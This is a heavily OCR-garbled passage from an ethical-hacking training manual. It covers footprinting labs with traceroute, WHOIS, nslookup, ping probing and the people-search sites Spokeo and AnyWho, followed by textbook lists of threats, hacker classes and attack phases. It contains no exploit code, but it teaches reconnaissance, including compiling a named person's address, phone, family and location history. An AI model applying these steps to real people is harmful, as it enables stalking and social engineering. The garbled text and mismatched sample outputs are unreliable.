ICMP protocol in the Standard Options section. Advanced Probe Details, check the Smart option 111 the Length
6. Select the
7. Under
of packet section and leave the rest of the options 111 tins section at their default settings.
Mail:mtahirzahid@yahoo.com
Page 186
Power Of Hacking
Note: Firewall is required to be disabled for appropriate output 8. 111 the Advanced Tracing Details section, the options remain at their default settings. 9. Check Stop on control m essages (ICMP) 111 the Advance Tracing
Details section options, select the target host,
10. To perform the trace after checking these
for instance www.google.com. and check the Port: Smart as default
(65535). 111 the drop-down menu, select the duration of time as Timed Trace
11. 12. Enter the
Type time of trace 111 the previously mentioned format as
Mail:mtahirzahid@yahoo.com
Page 187
Power Of Hacking
HH: MM: SS. this trace, the Trace tab changes
13. \Xlule Path Analyzer Pro performs
automatically to Stop. 14. To see the trace results, click the Report tab to display a linear chart depicting the number of hops between you and the target.
15. Click the Synopsis tab, which displays a one-page summary of your
trace results. 16. Click the Charts tab to view the results of your trace.
Mail:mtahirzahid@yahoo.com
Page 188
Power Of Hacking
17. Click Geo, which displays an imaginary world map format ol your
trace. features the Vital Statistics of your
Mail:mtahirzahid@yahoo.com
18. Now, click the Stats tab, which
Page 189
Power Of Hacking
current trace. Now Export the report by clicking Export on the toolbar.
19.
20. Bv default, the report will be saved at D:\Program Files (x86)\Path Analyzer Pro 2.7. However, you may change it to your preferred
location.
Analysis point:-
Document the IP addresses that are traced for the lab for further information. Tool/Utility Information Collected/Objectives Achieved Path Analyzer Pro Report: Mail:mtahirzahid@yahoo.com
Page 190
Power Of Hacking ■ Number of hops ■ IP address ■ Hostname יASN ■ Network name ■ Latency Synopsis: Displays summary of valuable information 011 DNS, Routing, Registries, Intercept Charts: Trace results 111 the form of chart Geo: Geographical view of the path traced Stats: Statistics of the trace Questions 1. What is die standard deviation measurement, and why is it important? 2. If your trace fails on the first or second hop, what could be the problem? 3. Depending on your TCP tracing options, why can't you get beyond my local network? SmartWhois:1. Follow the wizard-driven installation steps and install SmartWhois. 2. To launch the Start menu, hover the mouse cursor 111 the lower-left corner of the desktop 3. To launch SmartWhois, click SmartWhois 111 apps 4. The SmartWhois main window appears
Mail:mtahirzahid@yahoo.com
Page 191
Power Of Hacking
5. Type an IP address, hostname, or domain name 111 the field tab. An example of a domain name query is shown as follows, .www.google.com 6. Now, click the Query tab to find a drop-down list, and then click As Domain to enter domain name 111 the field.
7. 111 the left pane of the window, the result displays, and the right pane
Mail:mtahirzahid@yahoo.com
Page 192
Power Of Hacking displays die results of your query.
8. Click the Clear icon 111 the toolbar to clear die history.
9. To perform a sample host name query, type www.facebook.com. 10. Click the Query tab, and then select As IP/Hostname and enter a hostname in field. 11. 111 the left pane of the window, the result displays, and 111 the right
Mail:mtahirzahid@yahoo.com
Page 193
Power Of Hacking pane, the text area displays the results of your query.
12. Click the Clear icon 111 the toolbar to clear the history. 13. To perform a sample IP Address query, type the IP address 10.0.0.3 (Windows 8 IP address) 111 the IP, host or domain field. 14. 111 the left pane of the window, the result displays, and 111 the right pane, the text area displays the results of your query.
Lab Analysis Document all the IP addresses/hostnames for the lab lor further information. Mail:mtahirzahid@yahoo.com
Page 194
Power Of Hacking Tool/Utility Information Collected/Objectives Achieved SmartWhois Domain name query results: Owner of the website Host name query results: Geographical location of the hosted website IP address query results: Owner of the IP address Block Questions 1. Determine whether you can use SmartWhois if you are behind a firewall or a proxy server. 2. Why do you get Connection timed out or Connection failed errors? 3. Is it possible to call SmartWhois direcdy from my application? If yes, how? 4. What are LOC records, and are they supported by SmartWhois? 5. When running a batch query, you get only a certain percentage of the domains/IP addresses processed. Why are some of the records unavailable? Spokeo:1-Launch the Start menu by hovering the mouse cursor 111 the lower-left corner of the desktop 2. Click the Google Chrome app to launch the Chrome browser 3. Open a web browser, type http://www.spokeo.com, and press Enter 011 die
Mail:mtahirzahid@yahoo.com
Page 195
Power Of Hacking
keyboard die search, input die name of die person you want to search for 111
4. To begin
die Name field and click Search
5. Spokeo redirects you to search results widi die name you have entered
Mail:mtahirzahid@yahoo.com
Page 196
Power Of Hacking
6- Click the state name in which person you are searching lives
7- Now, click the appropriate City name for your search
8. Search results displaying die Address. Phone Number Email Address. City
Mail:mtahirzahid@yahoo.com
Page 197
Power Of Hacking
and State, etc. Search results displaying die Location History
9.
10. Spokeo search results display die Family Background, Family Economic Health and Family Lifestyle
11. Spokeo search results display die Neighborhood tor the search done Mail:mtahirzahid@yahoo.com
Page 198
Power Of Hacking
12. Similarly, perform a Reverse search by giving phone number, address, email address, etc. 111 die Search held to find details of a key person or an
organization
Analysis
Analyze and document all the results discovered 111 die lab exercise. Tool/Utility Information Collected/Objectives Achieved Profile Details: ■ Current Address ■ Phone Number ■ Email Address ■ Marital Status ■ Education ■ Occupation Mail:mtahirzahid@yahoo.com
Page 199
Power Of Hacking Spokeo Location History: Information about where the person has lived and detailed property information Family Background: Information about household members tor the person you searched Photos & Social Profiles: Photos, videos, and social network profiles Neighborhood: Information about the neighborhood Reverse Lookup: Detailed information for the search done using phone numbers Questions 1. How do you collect all the contact details of key people using Spokeo? 2. Is it possible to remove your residential listing? If yes, how? 3. How can you perform a reverse search using Spokeo? 4. List the kind of information that a reverse phone search and email search will yield. AnyWho:AnyWho is a part ot the ATTi family ot brands, which mostly tocuses 011 local searches tor products and services. The site lists information from the White Pages (Find a Person/Reverse Lookup) and the Yellow Pages (Find a Business). Lab Tasks 1. Launch Start menu by hovering the mouse cursor 011 the lower-left corner of the desktop2. Click the Google Chrome app to launch the Chrome browser 01 hcnual־
Mail:mtahirzahid@yahoo.com
Page 200
Power Of Hacking any other browser 3. In the browser, type http://www.anywho.com. and press Enter on the
keyboard 4. Input die name of die person you want to search for in die Find a Person
section and click Find AnyWho redirects you to search results with die name you have entered.
Mail:mtahirzahid@yahoo.com
5.
Page 201
Power Of Hacking The number of results might vary
6. Click the search results to see the address details and phone number of
that person 7. Sinulady, perform a reverse search by giving phone number or address inthe Reverse Lookup held
Mail:mtahirzahid@yahoo.com
Page 202
Power Of Hacking
8. Reverse lookup will redirect you to die search result page with the detailed information of die person for particular phone number or email address
Lab Analysis Analyze and document all the results discovered 111 die lab exercise. Tool/Utility Information Collected/Objectives Achieved Mail:mtahirzahid@yahoo.com
Page 203
Power Of Hacking AnyWho WhitePages (Find people by name): Exact location of a person with address and phone number Get Directions: Precise route to the address found lor a person Reverse Lookup (Find people by phone number): Exact location of a person with complete address Questions 1. Can vou collect all the contact details of the key people of any organization? 2. Can you remove your residential listing? It yes, how? 3. It you have an unpublished listing, why does your information show up in AnyWho? 4. Can you tind a person in AnyWho that you know has been at the same location for a year or less? If yes, how? 5. How can a listing be removed from AnyWho? Nslookup:1. Launch Start menu by hovering the mouse cursor 111 the lower-left corner of the desktop 2. Click the Command Prompt app to open the command prompt Window 3. 111 the command prompt, type nslookup, and press Enter 4. Now, type help and press Enter. The displayed response should be similar
Mail:mtahirzahid@yahoo.com
Page 204
Power Of Hacking to the one shown in the following figure
5. 111 the nslookup interactive mode, type â&#x20AC;&#x2022;set type=aâ&#x20AC;&#x2013; and press Enter 6. Now, type www.certifiedhacker.com and press Enter. The displayed response should be similar to die one shown 111 die following figure Note: The DNS server Address (202.53.8.8) will be different from die one shown inthe screenshot
7. You get Authoritative or Non-authoritative answer. The answer vanes, but 111 diis lab, it is Non-authoritative answer 8. 111 nslookup interactive mode, type set type=cname and press Enter 9. Now, type certifiedhacker.com and press Enter Note: The DNS server address ( 8 . 8 . 8 . 8 ) will be different dian die one 111 screenshot 10. The displayed response should be similar to die one shown as follows: Mail:mtahirzahid@yahoo.com
Page 205
Power Of Hacking > set type=cname > tahir.com Server: google-public-dns-a.google.com Address: 8. 8.8. 8
11. 111 nslookiip interactive mode, type server 64.147.99.90 (or any other IP address you receive in the previous step) and press Enter. 12. Now, type set type=a and press Enter. 13. Type www.certifiedhacker.com and press Enter. The displayed response should be similar to the one shown in the following figure.
14. It you receive a request timed out message, as shown in the previous Mail:mtahirzahid@yahoo.com
Page 206
Power Of Hacking tigure, dien your firewall is preventing you trom sending DNS queries outside your LAN. 15. In nslookup interactive mode, type set type=mx and press Enter. 16. Now, type tahirhacker.com and press Enter. The displayed response should be similar to the one shown in the following figure.
Lab Analysis Document all die IP addresses, DNS server names, and odier DNS information. Tool/Utility Information Collected/Objectives Achieved nslookup DNS Server Name: 202.53.8.8 Non-Authoritative Answer: 202.75.54.101 CNAME (Canonical Name of an alias) ■ Alias: cert1fiedhacker.com ■ Canonical name: google-publ1c-d11s-a.google.com MX (Mail Exchanger): tahirhacker.com Questions 1. Analyze and determine each of the following DNS resource records: ■ SOA■ NS ■ A ■ PTR Mail:mtahirzahid@yahoo.com
Page 207
Power Of Hacking ■ CNAME ■ MX ■ SRY 2. Evaluate the difference between an authoritative and non-audioritative answer. 3. Determine when you will receive request time out in nslookup. Ping:1. Find the IP address lor http:/ www.tahirhacker.com 2. To launch Start menu, hover the mouse cursor in the lower-left corner of the desktop 3. Click Command Prompt app to open the command prompt window 4-Type ping www.tahirhacker.com in the command prompt, and press Enter to find out its IP address 5-The displayed response should be similar to the one shown in the
following screenshot the IP address of www.tahirhacker.com that is
6-You receive
202.75.54.101 7-You also get information 011 Ping Statistics, such as packets sent, packets received, packets lost, and Approximate round-trip time 8-Now, find out the maximum frame size 011 the network. 111 the
Mail:mtahirzahid@yahoo.com
Page 208
Power Of Hacking command prompt, type ping www.tahirhacker.com -f-l 1500
9. The display Packet needs to be fragmented but DF set means that the frame is too large to be on the network and needs to be fragmented. Since we used -f switch with the ping command, the packet was not sent, and the ping command returned this error 10. Type ping www.tahirhacker.com -f-l 1300
11. You can see that the maximum packet size is less than 1500 bytes and more than 1300 bytes 12. Now, try different values until you find the maximum frame size. For instance, ping www.tahirhacker.com -f-l 1473 replies with Packet needs to be fragmented but DF set and ping www.tahirhacker.com -f-l 1472 replies with a successful ping. It indicates that 1472 bytes is the maximum frame size on tins machine network
Mail:mtahirzahid@yahoo.com
Page 209
Power Of Hacking Note: The maximum frame size will differ depending upon on the network
13. Now, find out what happens when TTL (Time to Live) expires. Ever}1 frame 011 the network has TTL defined. If TTL reaches 0, the router discards the packet. This mechanism prevents the loss of packets 14. In the command prompt, type ping www.tahirhacker.com -i 3. The displayed response should be similar to the one shown in the following figure, but with a different IP address
15. Reply from 183.82.14.17: TTL expired in transit means that the router (183.82.14.17, students will have some other IP address) discarded the frame, because its TTL has expired (reached 0) 16. The Emulate tracert (traceroute) command, using ping - manually, found the route from your PC to www.tahirhacker.com 17. The results you receive are different from those 111 tins lab. Your results may also be different from those of the person sitting next to you 18. 111 the command prompt, type ping www.tahirhacker.com -i 1 -n 1 . (Use -11 1 in order to produce only one answer, instead of receiving Mail:mtahirzahid@yahoo.com
Page 210
Power Of Hacking four answers on Windows or pinging forever on Linux.) The displayed response should be similar to the one shown in the following figure
19. 111 the command prompt, type ping www.tahirhacker.com -i 2 -n 1. The only difference between the previous pmg command and tliis one is -i 2 . The displayed response should be similar to the one shown
in the following figure prompt, type ping www.tahirhacker.com -i 3 -n
20. In the command
1. Use -n 1 in order to produce only one answer (instead of four on Windows or pinging forever on Linux). The displayed response should be similar to the one shown in the following figure
21. In the command prompt, type ping www.tahirhacker.com -i 4 -n 1 . Use -n 1 111 order to produce only one answer (instead of four on Windows or pinging forever on Linux). The displayed response should Mail:mtahirzahid@yahoo.com
Page 211
Power Of Hacking be similar to the one shown 111 the following figure
22. We have received the answer from the same IP address in two different steps. Tins one identifies the packet filter; some packet filters do not decrement TTL and are therefore invisible23. Repeat the above step until you reach the IP address for www.tahirhacker.com (In this case, 202.75.54.101)
24. Here the successful ping to reach www.tahirhacker.com is 15 hops. The output will be similar to the trace route results
25. Now, make a note of all die IP addresses from which you receive the reply during the ping to emulate tracert Mail:mtahirzahid@yahoo.com
Page 212
Power Of Hacking Lab Analysis Document all die IP addresses, reply request IP addresses, and their TJL'Ls. Tool/Utility Information Collected/Objectives Achieved Ping IP Address: 202.75.54.101 Packet Statistics: ■ Packets Sent — 4 ■ Packets Received — 3 ■ Packets Lost — 1 ■ Approximate Round Trip Time — 360ms Maximum Frame Size: 1472 TTL Response: 15 hops Questions 1. How does tracert (trace route) find the route that the trace packets are (probably) using? 2. Is there any other answer ping could give us (except those few we saw before)? 3. We saw before: יRequest timed out יPacket needs to be fragmented but DF set יReply from XXX.XXX.XXX.XX: TI L expired 111 transit What ICMP type and code are used for the ICMP Echo request? 4. Why does traceroute give different results on different networks (and sometimes on the same network)? TopInformationSecurityAttackVectors Mail:mtahirzahid@yahoo.com
Page 213
Power Of Hacking A n a t ta c k v e c t o r is a p a th o r m e a n s b y w h ic h a n a t t a c k e r g a in s a c c e s s toan in f o r m a t io n s y s te m t o p e r f o r m m a lic io u s a c tiv it ie s . T h is a t ta c k v e c t o r e n a b le s a n a t t a c k e r t o ta k e a d v a n ta g e o f t h e v u ln e r a b ilit ie s p r e s e n t in t h e in f o r m a t io n s y s t e m in o r d e r t o c a rr y o u t a p a r t ic u la r a tta c k . A lt h o u g h t h e r e a re s o m e t r a d it io n a l a t t a c k s v e c t o r s f r o m w h ic h a tta c k c anbeperformed, a tta c k v e c to r s c o m e in m a n y f o r m s ; o n e c a n n o t p r e d ic t in w h ic h f o r m a n a t ta c k v e c t o r ca n come. T h e f o llo w in g a re t h e p o s s ib le t o p a t t a c k v e c t o r s t h r o u g h w h ic h a tta c k e r s ca n a tta c k in f o r m a t io n s y s te m s : 0 V ir t u a liz a t io n a n d C lo u d C o m p u t in g 0 O r g a n iz e d C y b e r C r im e 0 UnpatchedSoftware 0 T a r g e te d M a lw a r e 0 S o cia l N e t w o r k in g 0 1 2 3 4 5 6 7 8
In s id e r T h r e a ts Botnets 0 Lack o f C y b e r S e c u r ity P ro fe s s io n a ls 0 N e t w o r k A p p lic a tio n s 0 I n a d e q u a te S e c u r ity P o lic ie s 0 M o b ile D e v ic e S e c u r ity 0 C o m p lia n c e w it h G o v t. L a w s a n d R e g u la tio n s 0 C o m p le x ity o f C o m p u t e r I n f r a s t r u c tu r e 0 H a c k t iv is m
InformationSecurityThreats I n f o r m a t io n s e c u r ity t h r e a t s a re b r o a d ly c la s s ifie d in t o t h r e e c a te g o r ie s , as fo llo w s : NaturalThreats Mail:mtahirzahid@yahoo.com
Page 214
Power Of Hacking N a tu r a l t h r e a t s in c lu d e n a t u r a l d is a s te r s s u c h as e a r th q u a k e s , h u rr ic a n e s , flo o d s , o r a n y n a t u r e - c r e a t e d d is a s t e r t h a t c a n n o t b e s to p . I n f o r m a t io n d a m a g e o r lo s t d u e t o n a tu r a l t h r e a t s c a n n o t b e p r e v e n t e d as n o o n e k n o w s in a d v a n c e t h a t th e s e ty p e s o f t h r e a t s w ill o c c u r. H o w e v e r , y o u c a n im p le m e n t a f e w s a fe g u a r d s a g a in s t n a tu r a l d is a s te rs b y a d o p t in g d is a s te r r e c o v e r y p la n s a n d c o n t in g e n c y p la n s . PhysicalSecurityThreats P h y s ic a l t h r e a t s m a y in c lu d e loss o r d a m a g e o f s y s t e m r e s o u r c e s t h r o u g h fir e , w a t e r , t h e f t , a n d p h y s ic a l im p a c t . P h y s ic a l im p a c t o n r e s o u r c e s ca n b e d u e t o a c o llis io n o r o t h e r d a m a g e , e it h e r in t e n t io n a lly o r u n in t e n t io n a lly . S o m e tim e s , p o w e r m a y a ls o d a m a g e h a r d w a r e u s e d t o s to r e in f o r m a t io n . HumanThreats H u m a n t h r e a t s in c lu d e t h r e a t s o f a tta c k s p e r f o r m e d b y b o t h in s id e r s a n d o u t s id e r s . In s id e r a tta c k s r e f e r t o a tta c k s p e r f o r m e d b y d is g r u n t le d o r m a lic io u s e m p lo y e e s . O u ts id e r a tta c k s r e fe r t o a tta c k s p e r f o r m e d b y m a lic io u s p e o p le n o t w it h in t h e o r g a n iz a tio n . In s id e r a tta c k e r s c a n b e t h e b ig g e s t t h r e a t t o in f o r m a t io n s y s te m as t h e y m a y k n o w t h e s e c u r it y p o s t u r e o f t h e in f o r m a t io n s y s te m , w h ile o u t s id e r a tta c k e r s a p p ly m a n y tr ic k s s u c h as s o c ia l e n g in e e r in g t o le a rn t h e s e c u r ity p o s t u r e o f t h e in f o r m a t io n s y s te m .
Mail:mtahirzahid@yahoo.com
Page 215
Power Of Hacking
Informa tionSecurityThreats(Cont‘d) 4r Kir H u m a n t h r e a t s c a n b e f u r t h e r c la s s ifie d in t o t h r e e ty p e s , as f o llo w s : NetworkThreats ״ A n e t w o r k is d e f in e d as t h e c o lle c t io n o f c o m p u t e r s a n d o t h e r h a r d w a r e c o n n e c te d b y c o m m u n ic a t io n c h a n n e ls t o s h a re r e s o u r c e s a n d in f o r m a t io n . A s t h e in f o r m a t io n tr a v e ls f r o m o n e c o m p u t e r t o t h e o t h e r t h r o u g h t h e c o m m u n ic a t io n c h a n n e l, a m a lic io u s p e rs o n m a y b re a k in t o t h e c o m m u n ic a t io n c h a n n e l a n d s te a l t h e in f o r m a t io n tr a v e lin g o v e r t h e n e t w o r k . T h e a t t a c k e r c a n im p o s e v a r io u s t h r e a t s o n a t a r g e t n e t w o r k : 0 I n f o r m a t io n g a t h e r in g 0 S n iffin g a n d e a v e s d r o p p in g Mail:mtahirzahid@yahoo.com
Page 216
Power Of Hacking 0 S p o o f in g 0 S e s s io n h ija c k in g a n d m a n - in - t h e - m id d le a tta c k s 0 SQ L in je c tio n 0 A R P P o is o n in g 0 P a s s w o r d -b a s e d a tta c k s D e n ia l o f s e rv ic e a tta c k Š C o m p r o m is e d - k e y a tta c k HostThreats H o s t t h r e a t s a re d ir e c te d a t a p a r t ic u la r s y s te m o n w h ic h v a lu a b le in f o r m a t io n re s id e s . A tta c k e r s t r y t o b re a c h t h e s e c u r ity o f t h e in f o r m a t io n s y s te m r e s o u r c e . T h e f o llo w in g a re p o s s ib le t h r e a t s t o t h e h o s t: 0 M a lw a r e a tta c k s 0 T a r g e t F o o t p r in t in g 0 P a s s w o rd a tta c k s 0 D e n ia l o f s e rv ic e a tta c k s 0 A r b it r a r y c o d e e x e c u tio n Š U n a u t h o r iz e d a c c e s s Š P riv ile g e e s c a la tio n 0 B a c k d o o r A tta c k s Mail:mtahirzahid@yahoo.com
Page 217
Power Of Hacking © P h y s ic a l s e c u r ity t h r e a t s ApplicationThreats If t h e p r o p e r s e c u r it y m e a s u r e s a re n o t c o n s id e r e d d u r in g d e v e lo pmentofthe p a r t ic u la r a p p lic a t io n , t h e a p p lic a tio n m ig h t b e v u ln e r a b le t o d if f e r e n t ty p e s o f a p p lic a tio n a tta c k s . A t ta c k e r s ta k e a d v a n ta g e o f v u ln e r a b ilit ie s p r e s e n t in t h e a p p lic a t io n t o s te a l o r d a m a g e t h e in f o r m a t io n . T h e f o llo w in g a re p o s s ib le t h r e a t s t o t h e a p p lic a tio n : © D a t a / I n p u t v a lid a t io n © A u t h e n t ic a t io n a n d A u t h o r iz a t io n a tta c k s © C o n fig u r a t io n m a n a g e m e n t © I n f o r m a t io n d is c lo s u re © S e s s io n m a n a g e m e n t issu e s © B u ffe r o v e r f lo w issu e s 0 C r y p to g r a p h y a tta c k s 0 P a r a m e te r m a n ip u la t io n 0 I m p r o p e r e r r o r h a n d lin g a n d e x c e p tio n m a n a g e m e n t 0 A u d it in g a n d lo g g in g issu e s
Mail:mtahirzahid@yahoo.com
Page 218
Power Of Hacking
ffectsof HackingonBusiness A c c o r d in g t o t h e S y m a n te c 2 0 1 2 S ta te o f I n f o r m a t io n s u rv e y , in f o r m a t io n c o s ts b u s in e s s e s w o r ld w id e $ 1 .1 t r i l l i o n a n n u a lly . E v e ry b u s in e s s m u s t p r o v id e s t r o n g s e c u r it y f o r its c u s to m e r s ; o t h e r w is e t h e b u s in e s s m a y p u t its r e p u t a t io n a t s ta k e a n d m a y e v e n fa c e la w s u its . A t ta c k e r s u s e h a c k in g t e c h n iq u e s t o s te a l, p ilfe r, a n d r e d is t r ib u t e in te lle c tu a l p r o p e r t y o f b u s in e s s e s a n d in t u r n t o m a k e fin a n c ia l g a in . A tta c k e r s m a y p r o f it , b u t t h e v ic t im 's b u s in e s s m u s t fa c e h u g e fin a n c ia l lo s s e s a n d m a y e v e n lo s e its r e p u t a t io n . O n c e a n a t t a c k e r g a in s c o n t r o l o v e r t h e u s e r's s y s te m , h e o r s h e ca n a c ce s s all t h e file s t h a t a re s to r e d o n t h e c o m p u t e r , in c lu d in g p e rs o n a l o r c o r p o r a t e fin a n c ia l in f o r m a t io n , c r e d it c a rd n u m b e r s , a n d c lie n t o r c u s t o m e r d a ta s to r e d o n t h a t s y s te m . If a n y s u c h in f o r m a t io n fa lls in to Mail:mtahirzahid@yahoo.com
Page 219
Power Of Hacking t h e w r o n g h a n d s , it m a y c r e a te c h a o s in t h e n o r m a l f u n c t io n in g o f a n o rg a n iz a tio n . O r g a n iz a tio n s m u s t p r o v id e a s tr o n g s e c u r ity t o its c ritic a l in f o r m a t io n s o u rc e s c o n t a in in g c u s t o m e r d a ta a n d its u p c o m in g re le a s e s o r id e a s . If t h e d a ta is a lte r e d o r s to le n , a c o m p a n y m a y lo s e c r e d ib ilit y a n d t h e t r u s t o f its c u s to m e r s . In a d d it io n t o t h e p o t e n t ia l fin a n c ia l loss t h a t m a y o c c u r, t h e loss o f in f o r m a t io n m a y c a u s e a b u s in e s s t o lo s e a c ru c ia l c o m p e t it iv e a d v a n ta g e o v e r its riv a ls . S o m e tim e s a tta c k e r s u se b o t n e t s t o la u n c h v a r io u s ty pesofDoSandotherwebb a s e d a tta c k s . T h is c a u s e s t h e t a r g e t b u s in e s s s e rv ic e s t o g o d o w n , w h ic h in t u r n m a y le a d t o loss o f r e v e n u e s . T h e r e a re m a n y t h in g s t h a t b u s in e s s e s c a n d o t o p r o t e c t th e m s e lv e s a n d t h e ir a s s e ts . K n o w le d g e is a k e y c o m p o n e n t in a d d re s s in g th is issu e . A s s e s s m e n t o f t h e ris k p r e v a le n t in a b u s in e s s a n d h o w a tta c k s c o u ld p o t e n t ia lly a ff e c t t h a t b u s in e s s is p a r a m o u n t f r o m a s e c u r ity p o in t o f v ie w . O n e d o e s n o t h a v e t o b e a s e c u r ity e x p e r t t o re c o g n iz e t h e d a m a g e t h a t ca n o c c u r w h e n a c o m p a n y is v ic tim iz e d b y a n a tta c k e r . B y u n d e r s t a n d in g t h e p r o b le m a n d e m p o w e r in g e m p lo y e e s t o fa c ilit a t e p r o t e c t io n a g a in s t a tta c k s , t h e c o m p a n y w o u ld b e a b le t o d e a l w it h a n y s e c u r it y is s u e s as t h e y a ris e .
Mail:mtahirzahid@yahoo.com
Page 220
Power Of Hacking
HackerClasses H a c k e rs a re m a in ly d iv id e d in t o e ig h t cla sse s: BlackHats B la c k h a ts a re in d iv id u a ls w it h e x t r a o r d in a r y c o m p u t in g s k ills , r e s o r tin g t o m a lic io u s o r d e s t r u c t iv e a c tiv itie s a n d a re a ls o k n o w n as c ra c k e rs . T h e s e in d iv id u a ls m o s t ly u s e t h e ir skills f o r o n ly d e s t r u c t iv e a c tiv itie s , c a u s in g h u g e lo ss e s f o r c o m p a n ie s as w e ll as in d iv id u a ls . T h e y u s e t h e ir sk ills in f in d in g v u ln e r a b ilit ie s in t h e v a r io u s n e t w o r k s in c lu d in g d e fe n s e a n d g o v e r n m e n t w e b s ite s , b a n k in g a n d fin a n c e , e tc . S o m e d o it t o c a u s e d a m a g e , s te a l in f o r m a t io n , d e s t r o y d a ta , o r e a rn m o n e y e a s ily b y h a c k in g ID s o f b a n k c u s to m e r s . ~WhiteHats ― * ייW h it e h a ts a re in d iv id u a ls w h o p o s s e s s h a c k in g s kills a n d u s e t h e m f o r d e fe n s iv e Mail:mtahirzahid@yahoo.com
Page 221
Power Of Hacking p u rp o s e s ; t h e y a re a ls o k n o w n as s e c u r it y a n a ly s ts . T h e s e d a y s , a lm o s t e v e r y c o m p a n y h a s s e c u r ity a n a ly s ts t o d e f e n d t h e ir s y s te m s a g a in s t t h e m a lic io u s a tta c k s . W h it e h a ts h e lp c o m p a n ie s s e c u re t h e ir n e t w o r k s f r o m o u ts id e in tr u d e r s . GrayHats G ra y h a ts a re t h e in d iv id u a ls w h o w o r k b o t h o f f e n s iv e ly a n d d e f e n s iv e ly a t v a rio u s tim e s . G ra y h a ts fa ll b e t w e e n w h it e a n d b la c k h a ts . G ra y h a ts m ig h t h e lp h a c k e rs b y f in d in g v a r io u s v u ln e r a b ilit ie s o f a s y s te m o r n e t w o r k a n d a t t h e s a m e t im e h e lp v e n d o r s t o im p r o v e p r o d u c t s ( s o f t w a r e o r h a r d w a r e ) b y c h e c k in g lim it a t io n s a n d m a k in g t h e m m o r e s e c u re , e tc . SuicideHackers S u ic id e h a c k e rs a re in d iv id u a ls w h o a im t o b r in g d o w n c ritic a l in f r a s t r ucturefora " c a u s e " a n d a re n o t w o r r ie d a b o u t fa c in g 3 0 y e a rs in ja il f o r t h e ir a c tio n s . S u ic id e h a c k e rs a re c lo s e ly r e la te d t o s u ic id e b o m b e r s , w h o s a c rific e t h e ir life f o r t h e a t ta c k a n d a re n o t c o n c e r n e d w it h t h e c o n s e q u e n c e s o f t h e ir a c tio n s . T h e r e h a s b e e n a rise in c y b e r t e r r o r is m in r e c e n t y e a rs . *jr ScriptKiddies S c rip t k id d ie s a re t h e u n s k ille d h a c k e rs w h o c o m p r o m is e s y s te m s b y r u n n in g s c rip ts , to o ls , a n d s o f t w a r e d e v e lo p e d b y re a l h a c k e rs . T h e y u tiliz e s m a ll, e a s y - to - u s e p r o g r a m s o r s c r ip ts as w e ll as d is tin g u is h e d te c h n iq u e s t o f in d a n d e x p lo it t h e v u ln e r a b ilit ie s o f a m a c h in e . S c rip t k id d ie s u s u a lly fo c u s o n t h e q u a n t it y o f a tta c k s r a t h e r t h a n t h e q u a lit y o f t h e a tta c k s t h a t Mail:mtahirzahid@yahoo.com
Page 222
Power Of Hacking t h e y in itia te . SpyHackers S p y h a c k e rs a re in d iv id u a ls w h o a re e m p lo y e d b y a n o r g a n iz a tio n t o p enetrateand g a in t r a d e s e c re ts o f t h e c o m p e t it o r . T h e s e in s id e rs ca n ta k e a d v a n ta g e o f t h e p riv ile g e s t h e y h a v e t o h a c k a s y s te m o r n e t w o r k . CyberTerrorists C y b e r t e r r o r is ts c o u ld b e p e o p le , o r g a n iz e d g r o u p s f o r m e d b y t e r r o r is t o rg a n iz a tio n s , t h a t h a v e a w id e ra n g e o f skills, m o t iv a t e d b y r e lig io u s o r p o litic a l b e lie fs , t o c r e a te fe a r b y la r g e - s c a le d is r u p t io n o f c o m p u t e r n e t w o r k s . T h is t y p e o f h a c k e r is m o r e d a n g e r o u s as t h e y c a n h a c k n o t o n ly a w e b s it e b u t w h o le I n t e r n e t z o n e s . m StateSponsoredHackers S ta te s p o n s o r e d h a c k e rs a re in d iv id u a ls e m p lo y e d b y t h e g o v e r n m enttopenetrate a n d g a in t o p - s e c r e t in f o r m a t io n a n d t o d a m a g e i n f o r m a t i o n s y s te msofothergovernments.
Mail:mtahirzahid@yahoo.com
Page 223
Power Of Hacking
Hacking Phases T h e v a r io u s p h a s e s in v o lv e d in h a c k in g a re : Š R e c o n n a is s a n c e Q S c a n n in g Q G a in in g A c c e s s Q M a in t a in in g A c c e s s Š C le a rin g T ra c k s Reconnaissance R e c o n n a is s a n c e r e fe r s t o t h e p r e p a r a t o r y p h a s e w h e r e a n a t t a c k e r g a t h e r s as m u c h in f o r m a t io n as p o s s ib le a b o u t t h e t a r g e t p r io r t o la u n c h in g t h e a tta c k . A ls o in th is p h a s e , t h e a t t a c k e r d r a w s o n c o m p e t it iv e in te llig e n c e t o le a rn m o r e a b o u t t h e ta r g e t . T h is p h a s e m a y a ls o in v o lv e n e t w o r k s c a n n in g , e it h e r e x te r n a l o r in te r n a l, w i t h o u t a u t h o r iz a t io n . Mail:mtahirzahid@yahoo.com
Page 224
Power Of Hacking T h is is t h e p h a s e t h a t a llo w s t h e p o t e n t ia l a t t a c k e r t o s tr a te g iz e h is o r h e r a tta c k . T h is m a y ta k e s o m e t im e as t h e a t t a c k e r w a its t o u n e a r t h c ru c ia l in f o r m a t io n . P a rt o f th is re c o n n a is s a n c e m a y in v o lv e " s o c ia l e n g in e e r in g . " A s o c ia l e n g in e e r is a p e rs o n w h o s m o o t h - t a lk s p e o p le in to r e v e a lin g in f o r m a t io n s u c h as u n lis te d p h o n e n u m b e r s , p a s s w o rd s , a n d o t h e r s e n s itiv e d a ta . A n o t h e r r e c o n n a is s a n c e t e c h n iq u e is " d u m p s t e r d iv in g . " D u m p s t e r d iv in g is t h e p ro c e s s o f lo o k in g t h r o u g h a n o r g a n iz a tio n 's tr a s h f o r d is c a rd e d s e n s itiv e in f o r m a t io n . A t ta c k e r s c a n u se t h e I n t e r n e t t o o b t a in in f o r m a t io n s u c h as e m p lo y e e 's c o n t a c t in f o r m a t io n , b u s in e s s p a r tn e r s , te c h n o lo g ie s in u se , a n d o t h e r c ritic a l b u s in e s s k n o w le d g e , b u t " d u m p s t e r d iv in g " m a y p r o v id e t h e m w it h e v e n m o r e s e n s itiv e in f o r m a t io n s u c h as u s e rn a m e s , p a s s w o rd s , c r e d it c a rd s t a t e m e n t s , b a n k s ta t e m e n t s , A T M slip s, s o c ia l s e c u r ity n u m b e r s , t e le p h o n e n u m b e r s , a n d so o n . T h e r e c o n n a is s a n c e t a r g e t ra n g e m a y in c lu d e t h e t a r g e t o r g a n iz a tio n 's c lie n ts , e m p lo y e e s , o p e r a tio n s , n e t w o r k s , a n d s y s te m s . F o r e x a m p le , a W h o is d a ta b a s e c a n p r o v id e in f o r m a t io n a b o u t I n t e r n e t a d d re s s e s , d o m a in n a m e s , a n d c o n ta c ts . If a p o t e n t ia l a t t a c k e r o b ta in s D N S i n f o r m a t i o n f r o m t h e re g is tr a r, a 